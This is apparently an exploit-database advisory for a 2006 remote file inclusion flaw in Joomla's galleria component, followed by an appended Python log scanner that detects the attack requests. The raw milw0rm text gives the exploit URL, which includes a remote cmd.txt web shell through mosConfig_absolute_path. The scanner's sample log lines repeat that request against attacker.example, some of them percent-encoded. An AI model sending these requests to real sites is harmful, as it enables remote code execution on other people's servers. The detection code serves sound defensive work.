Vendor: Galleria Component
By: sikunYuk
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: Galleria Component
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

galleria <= 1.0 Remote File Inclusion Vulnerability

A Remote File Inclusion vulnerability exists in the galleria component of Joomla! 1.0. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request. The request targets the vulnerable file, components/com_galleria/galleria.html.php, and sets the mosConfig_absolute_path parameter to the URL of a remote file containing the PHP code to be executed.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of the galleria component. Additionally, the application should be configured to only accept requests from trusted sources.

Exploit-DB raw data:

Title       : galleria <= 1.0 Remote File Inclusion Vulnerability
-
URL         : http://binarydigit.at/
-
Author      : sikunYuk
-
Mail        : ineal[at]gmail.com
-
exploit     : http://[target]/[path]/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://[f*ckscript]/cmd.txt?&cmd=
-
greatz      : agoes,skulmatic,Olibekas,Vitux,weleh,arioo Powered by #pisslovcrew,#papmahackerlink,#tigapanah,#yogyahacker
-

# milw0rm.com [2006-07-04]
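
For defenders reviewing web server logs, the request shape in the raw data above can be detected directly. The following is an added example, not part of the original advisory or the galleria project. It assumes combined-format access logs, and the function names, verdict labels and sample log lines are constructed for illustration. It also flags percent-encoded variants and any client-supplied `mosConfig_absolute_path`, since that value is a server-side configuration setting.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a combined-format log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT = "/components/com_galleria/galleria.html.php"
PARAM = "mosconfig_absolute_path"
# Values that point an include path away from the local file tree.
REMOTE_RE = re.compile(r"^\s*(?:(?:https?|ftps?|php|expect)://|data:|//)", re.I)

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (double-encoded values)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return 'remote-include', 'param-override' or None for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not fully_unquote(target.path).lower().endswith(SCRIPT):
        return None
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if fully_unquote(key).lower() == PARAM:
            # A client should never supply this parameter; a URL value is worse.
            remote = REMOTE_RE.match(fully_unquote(value))
            return "remote-include" if remote else "param-override"
    return None

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jul/2006:10:00:00 +0000] "GET /index.php?option=com_galleria&Itemid=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Jul/2006:10:01:12 +0000] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://attacker.example/cmd.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [04/Jul/2006:10:01:40 +0000] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http%253A%252F%252Fattacker.example%252Fcmd.txt HTTP/1.1" 200 312',
    '203.0.113.4 - - [04/Jul/2006:10:02:03 +0000] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=/tmp HTTP/1.1" 200 0',
]

def scan(lines):
    """Return (line number, verdict) for every flagged line."""
    verdicts = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in verdicts if v]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```
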